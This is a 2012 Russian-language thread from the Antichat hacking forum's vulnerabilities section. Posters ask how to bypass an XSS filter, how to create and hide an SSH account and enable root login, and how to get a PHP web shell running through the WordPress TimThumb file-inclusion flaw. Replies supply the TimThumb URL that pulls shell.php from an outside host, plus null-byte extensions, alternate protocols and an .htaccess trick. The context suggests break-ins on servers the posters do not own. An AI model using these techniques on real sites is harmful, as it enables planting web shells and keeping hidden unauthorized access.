HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.06.2012, 07:20
4otkii
Новичок
Регистрация: 19.09.2010
Сообщений: 1
С нами: 8234966

Репутация: 0
По умолчанию

Здравствуйте, возможно ли обойти фильтр XSS если никакие символы не фильтруются, кроме как если за "
 
Ответить с цитированием

  #2  
Старый 12.06.2012, 19:58
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Как создать учетную запись в ssh срочно !
 
Ответить с цитированием

  #3  
Старый 12.06.2012, 20:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Groove  
Как создать учетную запись в ssh срочно !
sudo useradd noob

sudo passwd noob

***** (тут пасс)
 
Ответить с цитированием

  #4  
Старый 12.06.2012, 20:08
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Цитата:
Сообщение от Konqi  
sudo useradd noob
sudo passwd noob
***** (тут пасс)
куда это прописывать ?
 
Ответить с цитированием

  #5  
Старый 12.06.2012, 20:09
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Groove  
куда это прописывать ?
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом

если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл

/etc/ssh/sshd_config

PermitRootLogin no -> PermitRootLogin yes
 
Ответить с цитированием

  #6  
Старый 12.06.2012, 20:35
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Цитата:
Сообщение от Konqi  
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом
если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл
/etc/ssh/sshd_config
PermitRootLogin
no
-> PermitRootLogin
yes
А как спрятать учетку ?
 
Ответить с цитированием

  #7  
Старый 12.06.2012, 20:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Groove  
А как спрятать учетку ?
спрятать от кого или от чего?

в /etc/passwd все равно палится учетка

Код:
cat /etc/passwd  | awk -F: '{print $1}'
 
Ответить с цитированием

  #8  
Старый 13.06.2012, 01:38
promarketing
Новичок
Регистрация: 05.08.2011
Сообщений: 14
С нами: 7774166

Репутация: 0
По умолчанию

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
 
Ответить с цитированием

  #9  
Старый 13.06.2012, 02:20
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

а ты пробовал blabla.php%00.jpg , или через temper data?

или так же заместо http://yousite.com/shell.php

так https://yousite.com/shell.php,ftp://yousite.com/shell.php?
 
Ответить с цитированием

  #10  
Старый 13.06.2012, 02:29
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

.htaccess решает проблему если повезет с правами.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.